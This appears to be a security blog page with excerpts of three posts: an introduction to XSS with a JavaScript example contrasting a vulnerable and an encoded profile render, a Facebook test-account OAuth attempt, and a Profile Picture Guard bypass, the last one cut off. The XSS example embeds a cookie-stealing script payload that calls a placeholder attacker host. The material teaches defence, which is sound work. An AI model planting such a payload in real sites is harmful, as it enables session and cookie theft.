Posts

Introduction to XSS - Methods, Impact and Prevention

When searching for hacking tutorials or reading through write-ups, you will definitely come across the term XSS. In this post I am going to explain what XSS is, what its impact is and how to achieve it, with a few examples. XSS, aka Cross-Site Scripting, is a vulnerability which allows an attacker to inject JavaScript code into the target website so that it executes in the browser of whoever views the affected page. This allows the attacker to log the victim's keystrokes and details, render a phishing page inside the trusted site, read anti-CSRF tokens and forge requests on the victim's behalf, steal cookies that are not marked HttpOnly, and much more. XSS is usually divided into two types, stored and reflected (DOM-based XSS, where the injection happens entirely in client-side JavaScript, is often counted as a third). Stored XSS is the type of XSS where user-entered data is stored on the server and then displayed on some other page. For example, parameters like name, place, about etc. can be vulnerable to stored XSS. That said, fields like password are stored once and never retrieved or shown again, hence they are not vulnerable to stored XSS. When can this be exploited? The developer isn't validating or output-encoding user input. The developer added certain validations but they are client side
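The stored-XSS case described above, as an added example that is not part of the original post: a profile page renders fields the user saved earlier (the post's own `name` and `about` examples) and a stored payload runs for every viewer when they are concatenated raw, but not when they are encoded for the HTML context at output time. The profile record is constructed sample data, and the function names are my own.

```javascript
// Added example (not from the original post): a stored-XSS sink and its fix.
// A profile page builds HTML from fields the user saved earlier ("name" and
// "about" are the post's own examples). Concatenating them raw lets a stored
// <script> execute for every viewer; encoding them on output neutralises it.

// Constructed sample record, as an attacker might have saved it through the
// profile form. The exfiltration host is a placeholder, not a real site.
const storedProfile = {
  name: 'Mallory',
  about: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
};

// Vulnerable render: stored fields are interpolated straight into markup.
function renderProfileVulnerable(profile) {
  return `<h1>${profile.name}</h1>\n<p class="about">${profile.about}</p>`;
}

// Output encoding for HTML text and double-quoted attribute contexts. These
// five characters are the ones that can change document structure there.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Server-side input validation for a constrained field. This is defence in
// depth, not a substitute for encoding: "about" is free text and cannot be
// allow-listed this way, and a client-side check is trivially bypassed.
function validateName(name) {
  return /^[\p{L} .'-]{1,50}$/u.test(String(name));
}

// Hardened render: same template, every untrusted value encoded on output.
function renderProfileSafe(profile) {
  return `<h1>${escapeHtml(profile.name)}</h1>\n<p class="about">${escapeHtml(profile.about)}</p>`;
}

// Crude observability helper for this example only: a real browser decides
// what executes; here we just look for a tag an HTML parser would honour.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable:', renderProfileVulnerable(storedProfile));
console.log('safe:      ', renderProfileSafe(storedProfile));
console.log('name valid:', validateName(storedProfile.name),
            '| "<script>" valid:', validateName('<script>'));
```

The point to take away is that the fix lives at the output sink, not only at the input form: the same `about` value is stored in both versions, and only the render that encodes it is safe.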

Bug in Facebook OAuth. Convert facebook test account to real account in instagram/ oculus

Facebook provides you the ability to create test accounts for white-hat testing. You can create them by visiting the URL facebook.com/whitehat/accounts. Facebook wants you to test for security issues using test accounts only, and if you're unable to reproduce an issue with a test account, then it is okay to use a real account you own, or you have to get permission from the account owner. In addition, Facebook implemented certain limitations for the test accounts. I got stuck on the last one: "Can't convert to a real user account." OK, let's try it. I tried for about a day in different ways, like using a fake email at the account recovery system and so on, but failed. And then I thought that I might find a way by abusing the Facebook OAuth system with test accounts. I navigated to a few sites which allow login with Facebook. But when I tried to log in with Facebook, it showed an error. Oops!! Screwed again. Then I decided to stop there and went to bed because it was 3 AM.

Download Guarded Profile Picture From Facebook

Facebook recently introduced a feature called Profile Picture Guard. It protects your profile picture from being downloaded by others. If you want to know more about it, you can read about it here: Profile Picture Guard | Facebook Help. When turning on Profile Picture Guard, Facebook assures you that no one else can download your profile picture. Really??? 😆😆😆 Never!!! I worked on it for some time to see how I could bypass this restriction. I tried calculating the URL to the CDN, but it requires a signature to access the file. I tried viewing the image and changing its dimensions, and the result was negative. What's next? Think outside the box. I thought I should leave it and change my target first. Then I decided to test it from another account of mine to check whether there is a way to bypass it. I opened the profile picture and copied the URL. Then I opened an incognito window to log in to the other account. I went to the URL that I copied earlier and was about to type my username and password in the login form at the top of the page. Sudd